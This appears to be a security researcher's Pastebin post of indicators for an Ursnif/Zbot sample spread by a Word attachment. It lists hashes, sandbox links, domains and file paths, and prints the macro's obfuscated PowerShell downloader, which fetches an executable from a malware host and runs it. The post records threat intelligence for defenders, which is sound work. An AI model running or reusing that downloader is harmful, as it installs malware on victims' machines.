Advertisement
Neonprimetime

2018-05-18 ursnif sample

May 18th, 2018
2,859
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. @neonprimetime security
  2. @James_inthe_box says May 15 Fresh #ursnif #opendir
  3.  
  4.  
  5. ---------
  6. Email
  7. ---------
  8. subject: Re: PIWHA General Membership Meeting March 10th
  9. attachment: Pwdlubricants_Inquiry.doc
  10. ---------
  11. word doc
  12. ---------
  13. md5, 044ecf685bee2b589aa88fda46ae0163
  14. https://www.reverse.it/sample/b5abde97d3e69c6b726bba767aadf9e6463c976f7a24df19bd6cf6341f3d5242?environmentId=100
  15. ---------
  16. powershell
  17. ---------
  18. $nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' http://dq9wq1wdq9wd1.com/HUN/testv.php?l=uho5.yarn'.Split('@');$SDC = $env:public + '\' + $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}catch{}}
  19. ---------
  20. downloader url
  21. ---------
  22. hxxp://dq9wq1wdq9wd1[.]com/HUN/testv.php?l=uho5.yarn
  23. ---------
  24. payload
  25. ---------
  26. %PUBLIC%\114758.exe
  27. Labeled as "Trojan.Zbot" (9/66)
  28. MD5, e52bd651def3bd8e20791d80bee35515
  29. https://www.reverse.it/sample/fa41d489870e5cacafbbb691886015ce8959ddbf50af1802092acb6490c1da0f?environmentId=100
  30. ---------
  31. copies itself to:
  32. C:\Users\xxx\AppData\Roaming\Microsoft\Audibres\comr2022.exe
  33. network coonnections:
  34. 1fq8wd1q1we.net
  35. myip.opendns.com
  36. interesting in memory strings:
  37. 0x1749b09 (30): 1fq8wd1q1we.net g18qqwe8qw.net
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement